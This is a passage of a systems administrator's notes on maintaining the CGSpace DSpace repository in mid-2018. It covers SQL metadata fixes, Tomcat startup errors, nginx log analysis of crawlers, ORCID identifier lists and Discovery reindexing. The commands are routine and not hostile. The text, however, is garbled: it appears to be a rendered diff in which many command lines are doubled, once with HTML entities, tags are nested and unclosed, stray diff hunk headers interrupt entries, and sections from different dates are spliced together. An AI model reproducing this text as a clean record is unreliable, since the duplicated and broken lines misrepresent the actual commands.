</code></pre><ul>
<li>I think I should fix that as well as some other garbage values like &ldquo;test&rdquo; and &ldquo;dspace.ilri.org&rdquo; etc:</li>
</ul>
<pre tabindex="0"><code>dspace=# begin;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://books.google', 'https://books.google') where resource_type_id=2 and metadata_field_id=222 and text_value like 'http://books.google.%';
UPDATE 785
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'books.google', 'https://books.google') where resource_type_id=2 and metadata_field_id=222 and text_value ~ '^books\.google\..*';
UPDATE 4
dspace=# update metadatavalue set text_value='https://books.google.com/books?id=meF1CLdPSF4C' where resource_type_id=2 and metadata_field_id=222 and text_value='meF1CLdPSF4C';
UPDATE 1
dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=222 and metadata_value_id in (2299312, 10684, 10700, 996403);
DELETE 4
dspace=# commit;
</code></pre><ul>
<li>Testing DSpace 5.8 with PostgreSQL 9.6 and Tomcat 8.5.32 (instead of my usual 7.0.88) and for some reason I get autowire errors on Catalina startup with 8.5.32:</li>
</ul>
<pre tabindex="0"><code>03-Jul-2018 19:51:37.272 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener]
java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
at org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener.contextInitialized(DSpaceKernelServletContextListener.java:92)
at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4792)
at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5256)
@ -217,7 +217,7 @@ dspace=# commit;
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at java.lang.Thread.run(Thread.java:748)
Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
</code></pre><ul>
<li>Gotta check that out later&hellip;</li>
</ul>
<ul>
<li>Abenet wants to be able to search by journal title (dc.source) in the advanced Discovery search so I opened an issue for it (<a href="https://github.com/ilri/DSpace/issues/384">#384</a>)</li>
<li>I regenerated the list of names for all our ORCID iDs using my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script:</li>
</ul>
<pre tabindex="0"><code>$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq &gt; /tmp/2018-07-08-orcids.txt
<pre tabindex="0"><code>$ grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq &gt; /tmp/2018-07-08-orcids.txt
$ ./resolve-orcids.py -i /tmp/2018-07-08-orcids.txt -o /tmp/2018-07-08-names.txt -d
</code></pre><ul>
<li>But after comparing to the existing list of names I didn&rsquo;t see much change, so I just ignored it</li>
<li>Uptime Robot said that CGSpace was down for two minutes early this morning but I don&rsquo;t see anything in Tomcat logs or dmesg</li>
<li>Uptime Robot said that CGSpace was down for two minutes again later in the day, and this time I saw a memory error in Tomcat&rsquo;s <code>catalina.out</code>:</li>
</ul>
<pre tabindex="0"><code>Exception in thread &quot;http-bio-127.0.0.1-8081-exec-557&quot; java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>Exception in thread &#34;http-bio-127.0.0.1-8081-exec-557&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>I&rsquo;m not sure if it&rsquo;s the same error, but I see this in DSpace&rsquo;s <code>solr.log</code>:</li>
</ul>
<pre tabindex="0"><code>org.apache.solr.client.solrj.SolrServerException: IOException occured when talking to server
...
</code></pre><ul>
<li>I got a message from Linode tonight that CPU usage was high on CGSpace for the past few hours around 8PM GMT</li>
<li>Looking in the nginx logs I see the top ten IP addresses active today:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;09/Jul/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;09/Jul/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1691 40.77.167.84
1701 40.77.167.69
1718 50.116.102.77
...
</code></pre><ul>
<li>Of those, <em>all</em> except <code>70.32.83.92</code> and <code>50.116.102.77</code> are <em>NOT</em> re-using their Tomcat sessions, for example from the XMLUI logs:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2018-07-09
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88&#39; dspace.log.2018-07-09
4435
</code></pre><ul>
<li><code>95.108.181.88</code> appears to be Yandex, so I dunno why it&rsquo;s creating so many sessions, as its user agent should match Tomcat&rsquo;s Crawler Session Manager Valve</li>
</ul>
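<ul>
<li>One way to sanity check that (a sketch) is to look at the user agents that IP actually sends:</li>
</ul>
<pre tabindex="0"><code># grep 95.108.181.88 /var/log/nginx/access.log | awk -F'&quot;' '{print $6}' | sort | uniq -c
</code></pre>
<ul>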
<li>Linode sent an alert about CPU usage on CGSpace again, about 13:00UTC</li>
<li>These are the top ten users in the last two hours:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;10/Jul/2018:(11|12|13)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;10/Jul/2018:(11|12|13)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
81 193.95.22.113
82 50.116.102.77
112 40.77.167.90
...
</code></pre><ul>
<li>Looks like <code>213.139.52.250</code> is Moayad testing his new CGSpace visualization thing:</li>
</ul>
<pre tabindex="0"><code>213.139.52.250 - - [10/Jul/2018:13:39:41 +0000] &quot;GET /bitstream/handle/10568/75668/dryad.png HTTP/2.0&quot; 200 53750 &quot;http://localhost:4200/&quot; &quot;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36&quot;
<pre tabindex="0"><code>213.139.52.250 - - [10/Jul/2018:13:39:41 +0000] &#34;GET /bitstream/handle/10568/75668/dryad.png HTTP/2.0&#34; 200 53750 &#34;http://localhost:4200/&#34; &#34;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36&#34;
</code></pre><ul>
<li>He said there was a bug that caused his app to request a bunch of invalid URLs</li>
<li>I&rsquo;ll have to keep an eye on this and see how their platform evolves</li>
<li>Uptime Robot said that CGSpace went down a few times last night, around 10:45 PM and 12:30 AM</li>
<li>Here are the top ten IPs from last night and this morning:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;11/Jul/2018:22&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;11/Jul/2018:22&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
48 66.249.64.91
50 35.227.26.162
57 157.55.39.234
...
97 183.128.40.185
97 240e:f0:44:fa53:745a:8afe:d221:1232
3634 208.110.72.10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;12/Jul/2018:00&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
25 216.244.66.198
38 40.77.167.185
46 66.249.64.93
...
</code></pre><ul>
<li>A brief Google search doesn&rsquo;t turn up any information about what this bot is, but lots of users complaining about it</li>
<li>This bot does make a lot of requests all through the day, although it seems to re-use its Tomcat session:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;Pcore-HTTP&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;Pcore-HTTP&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
17098 208.110.72.10
# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10' dspace.log.2018-07-11
1161
# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10' dspace.log.2018-07-12
1885
</code></pre><ul>
<li>I think the problem is that, despite the bot requesting <code>robots.txt</code>, it almost exclusively requests dynamic pages from <code>/discover</code>:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;Pcore-HTTP&quot; | grep -o -E &quot;GET /(browse|discover|search-filter)&quot; | sort -n | uniq -c | sort -rn
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;Pcore-HTTP&#34; | grep -o -E &#34;GET /(browse|discover|search-filter)&#34; | sort -n | uniq -c | sort -rn
13364 GET /discover
993 GET /search-filter
804 GET /browse
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;Pcore-HTTP&quot; | grep robots
208.110.72.10 - - [12/Jul/2018:00:22:28 +0000] &quot;GET /robots.txt HTTP/1.1&quot; 200 1301 &quot;https://cgspace.cgiar.org/robots.txt&quot; &quot;Pcore-HTTP/v0.44.0&quot;
</code></pre><ul>
<li>So this bot is just like Baiduspider, and I need to add it to the nginx rate limiting</li>
<li>I&rsquo;ll also add it to Tomcat&rsquo;s Crawler Session Manager Valve to force the re-use of a common Tomcat session for all crawlers just in case</li>
</ul>
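<ul>
<li>For reference, that valve is enabled in Tomcat&rsquo;s <code>server.xml</code> with something like this sketch (the user agent regex is an assumption, not our exact configuration):</li>
</ul>
<pre tabindex="0"><code>&lt;Valve className=&quot;org.apache.catalina.valves.CrawlerSessionManagerValve&quot;
       crawlerUserAgents=&quot;.*[bB]ot.*|.*Yandex.*|.*Pcore-HTTP.*&quot;
       sessionInactiveInterval=&quot;60&quot;/&gt;
</code></pre>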
<ul>
<li>Generate a list of affiliations for Peter and Abenet to go over so we can batch correct them before we deploy the new data visualization dashboard:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv header;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv header;
COPY 4518
</code></pre><h2 id="2018-07-15">2018-07-15</h2>
<ul>
</ul>
<pre tabindex="0"><code>...
OAI 2.0 manager action ended. It took 697 seconds.
</code></pre><ul>
<li>I need to ask the dspace-tech mailing list if the nightly OAI import catches the case of old items that have had metadata or mappings change</li>
<li>ICARDA sent me a list of the ORCID iDs they have in the MEL system and it looks like almost 150 are new and unique to us!</li>
</ul>
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
1020
$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
1158
</code></pre><ul>
<li>I combined the two lists and regenerated the names for all of our ORCID iDs using my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script:</li>
</ul>
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; /tmp/2018-07-15-orcid-ids.txt
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2018-07-15-orcid-ids.txt
$ ./resolve-orcids.py -i /tmp/2018-07-15-orcid-ids.txt -o /tmp/2018-07-15-resolved-orcids.txt -d
</code></pre><ul>
<li>Then I added the XML formatting for controlled vocabularies, sorted the list with GNU sort in vim via <code>% !sort</code> and then checked the formatting with tidy:</li>
</ul>
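<ul>
<li>Something like this sketch would do the tidy check (flags assumed):</li>
</ul>
<pre tabindex="0"><code>$ tidy -xml -utf8 -i -q -m dspace/config/controlled-vocabularies/cg-creator-id.xml
</code></pre>
<ul>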
<li>For every day in the past week I only see about 50 to 100 requests per day, but then about nine days ago I see 1500 requests</li>
<li>In there I see two bots making about 750 requests each, and this one is probably Altmetric:</li>
</ul>
<pre tabindex="0"><code>178.33.237.157 - - [09/Jul/2018:17:00:46 +0000] &quot;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////100 HTTP/1.1&quot; 200 58653 &quot;-&quot; &quot;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&quot;
178.33.237.157 - - [09/Jul/2018:17:01:11 +0000] &quot;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////200 HTTP/1.1&quot; 200 67950 &quot;-&quot; &quot;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&quot;
<pre tabindex="0"><code>178.33.237.157 - - [09/Jul/2018:17:00:46 +0000] &#34;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////100 HTTP/1.1&#34; 200 58653 &#34;-&#34; &#34;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&#34;
178.33.237.157 - - [09/Jul/2018:17:01:11 +0000] &#34;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////200 HTTP/1.1&#34; 200 67950 &#34;-&#34; &#34;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&#34;
...
178.33.237.157 - - [09/Jul/2018:22:10:39 +0000] &quot;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////73900 HTTP/1.1&quot; 200 25049 &quot;-&quot; &quot;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&quot;
</code></pre><ul>
<li>So if they are getting 100 records per OAI request it would take them 739 requests</li>
<li>I wonder if I should add this user agent to the Tomcat Crawler Session Manager valve&hellip; does OAI use Tomcat sessions?</li>
<li>Appears not:</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh 'https://cgspace.cgiar.org/oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////100'
<pre tabindex="0"><code>$ http --print Hh &#39;https://cgspace.cgiar.org/oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////100&#39;
GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////100 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
...
X-XSS-Protection: 1; mode=block
</code></pre><ul>
<li>Still discussing dates with IWMI</li>
<li>I looked in the database to see the breakdown of date formats used in <code>dc.date.issued</code>, ie YYYY, YYYY-MM, or YYYY-MM-DD:</li>
</ul>
<pre tabindex="0"><code>dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}$';
<pre tabindex="0"><code>dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ &#39;^[0-9]{4}$&#39;;
count
-------
53292
(1 row)
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}-[0-9]{2}$';
count
-------
3818
(1 row)
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}-[0-9]{2}-[0-9]{2}$';
count
-------
17357
</code></pre>

View File

<ul>
<li>I did some quick sanity checks and small cleanups in Open Refine, checking for spaces, weird accents, and encoding errors</li>
<li>Finally I did a test run with the <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897"><code>fix-metadata-value.py</code></a> script:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
$ ./delete-metadata-values.py -i 2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -t correct -m 211
$ ./delete-metadata-values.py -i 2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211
</code></pre><h2 id="2018-08-16">2018-08-16</h2>
<ul>
<li>Generate a list of the top 1,500 authors on CGSpace for Sisay so he can create the controlled vocabulary:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc limit 1500) to /tmp/2018-08-16-top-1500-authors.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc limit 1500) to /tmp/2018-08-16-top-1500-authors.csv with csv;
</code></pre><ul>
<li>Start working on adding the ORCID metadata to a handful of CIAT authors as requested by Elizabeth earlier this month</li>
<li>I might need to overhaul the <a href="https://gist.github.com/alanorth/a49d85cd9c5dea89cddbe809813a7050">add-orcid-identifiers-csv.py</a> script to be a little more robust about author order and ORCID metadata that might have been altered manually by editors after submission, as this script was written without that consideration</li>
</ul>
<pre tabindex="0"><code>$ sudo docker run --name dspacedb -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest ~/Downloads/cgspace_2018-08-16.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
</code></pre><h2 id="2018-08-19">2018-08-19</h2>
<ul>
<li>Keep working on the CIAT ORCID identifiers from Elizabeth</li>
<li>In the spreadsheet she sent me there are some names with other versions in the database, so when it is obviously the same one (ie &ldquo;Schultze-Kraft, Rainer&rdquo; and &ldquo;Schultze-Kraft, R.&rdquo;) I will just tag them with ORCID identifiers too</li>
<li>This is less obvious and more error prone with names like &ldquo;Peters&rdquo; where there are many more authors</li>
<li>I see some errors in the variations of names as well, for example:</li>
</ul>
</ul>
<pre tabindex="0"><code>...
Verchot, Louis V.
</code></pre><ul>
<li>In the end, I&rsquo;ll run the following CSV with my <a href="https://gist.github.com/alanorth/a49d85cd9c5dea89cddbe809813a7050">add-orcid-identifiers-csv.py</a> script:</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;Campbell, Bruce&quot;,Bruce M Campbell: 0000-0002-0123-4859
&quot;Campbell, Bruce M.&quot;,Bruce M Campbell: 0000-0002-0123-4859
&quot;Campbell, B.M&quot;,Bruce M Campbell: 0000-0002-0123-4859
&quot;Peters, Michael&quot;,Michael Peters: 0000-0003-4237-3916
&quot;Peters, M.&quot;,Michael Peters: 0000-0003-4237-3916
&quot;Peters, M.K.&quot;,Michael Peters: 0000-0003-4237-3916
&quot;Tamene, Lulseged&quot;,Lulseged Tamene: 0000-0002-3806-8890
&quot;Desta, Lulseged Tamene&quot;,Lulseged Tamene: 0000-0002-3806-8890
&quot;Läderach, Peter&quot;,Peter Läderach: 0000-0001-8708-6318
&quot;Lundy, Mark&quot;,Mark Lundy: 0000-0002-5241-3777
&quot;Schultze-Kraft, Rainer&quot;,Rainer Schultze-Kraft: 0000-0002-4563-0044
&quot;Schultze-Kraft, R.&quot;,Rainer Schultze-Kraft: 0000-0002-4563-0044
&quot;Verchot, Louis&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, L&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, L. V.&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, L.V&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, L.V.&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, LV&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, Louis V.&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Mukankusi, Clare&quot;,Clare Mukankusi: 0000-0001-7837-4545
&quot;Mukankusi, Clare M.&quot;,Clare Mukankusi: 0000-0001-7837-4545
&quot;Wyckhuys, Kris&quot;,Kris Wyckhuys: 0000-0003-0922-488X
&quot;Wyckhuys, Kris A. G.&quot;,Kris Wyckhuys: 0000-0003-0922-488X
&quot;Wyckhuys, Kris A.G.&quot;,Kris Wyckhuys: 0000-0003-0922-488X
&quot;Chirinda, Ngonidzashe&quot;,Ngonidzashe Chirinda: 0000-0002-4213-6294
&quot;Chirinda, Ngoni&quot;,Ngonidzashe Chirinda: 0000-0002-4213-6294
&quot;Ngonidzashe, Chirinda&quot;,Ngonidzashe Chirinda: 0000-0002-4213-6294
</code></pre><ul>
<li>The invocation would be:</li>
</ul>
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-08-16-ciat-orcid.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-08-16-ciat-orcid.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>I ran the script on DSpace Test and CGSpace and tagged a total of 986 ORCID identifiers</li>
<li>Looking at the list of author affiliations from Peter one last time</li>
<li>This character all by itself is indicative of encoding issues in French, Italian, and Spanish names, for example: De´veloppement and Investigacio´n</li>
<li>I will run the following on DSpace Test and CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
$ ./delete-metadata-values.py -i /tmp/2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -t correct -m 211
$ ./delete-metadata-values.py -i /tmp/2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211
</code></pre><ul>
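<li>Afterwards, a quick sanity check for any remaining values with the stray accent character could be something like this (a sketch against the affiliation field, id 211, from above):</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=211 AND text_value LIKE '%´%';
</code></pre><ul>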
<li>Then force an update of the Discovery index on DSpace Test:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 72m12.570s
@ -282,7 +282,7 @@ sys 2m2.461s
</code></pre><ul>
<li>And then on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 79m44.392s
@ -292,9 +292,9 @@ sys 2m20.248s
<li>Run system updates on DSpace Test and reboot the server</li>
<li>In unrelated news, I see some newish Russian bot making a few thousand requests per day and not re-using its XMLUI session:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep '19/Aug/2018' | grep -c 5.9.6.51
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;19/Aug/2018&#39; | grep -c 5.9.6.51
1553
# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-08-19
1724
</code></pre><ul>
<li>I don&rsquo;t even know how it&rsquo;s possible for the bot to use MORE sessions than total requests&hellip;</li>
@ -391,11 +391,11 @@ $ dspace database migrate ignored
<li>I exported a list of items from Listings and Reports with the following criteria: from year 2013 until now, have WLE subject <code>GENDER</code> or <code>GENDER POVERTY AND INSTITUTIONS</code>, and CRP <code>Water, Land and Ecosystems</code></li>
<li>Then I extracted the Handle links from the report so I could export each item&rsquo;s metadata as CSV</li>
</ul>
<pre tabindex="0"><code>$ grep -o -E &quot;[0-9]{5}/[0-9]{0,5}&quot; listings-export.txt &gt; /tmp/iwmi-gender-items.txt
<pre tabindex="0"><code>$ grep -o -E &#34;[0-9]{5}/[0-9]{0,5}&#34; listings-export.txt &gt; /tmp/iwmi-gender-items.txt
</code></pre><ul>
<li>Then on the DSpace server I exported the metadata for each item one by one:</li>
</ul>
<pre tabindex="0"><code>$ while read -r line; do dspace metadata-export -f &quot;/tmp/${line/\//-}.csv&quot; -i $line; sleep 2; done &lt; /tmp/iwmi-gender-items.txt
<pre tabindex="0"><code>$ while read -r line; do dspace metadata-export -f &#34;/tmp/${line/\//-}.csv&#34; -i $line; sleep 2; done &lt; /tmp/iwmi-gender-items.txt
</code></pre><ul>
<li>But from here I realized that each of the fifty-nine items will have different columns in their CSVs, making it difficult to combine them</li>
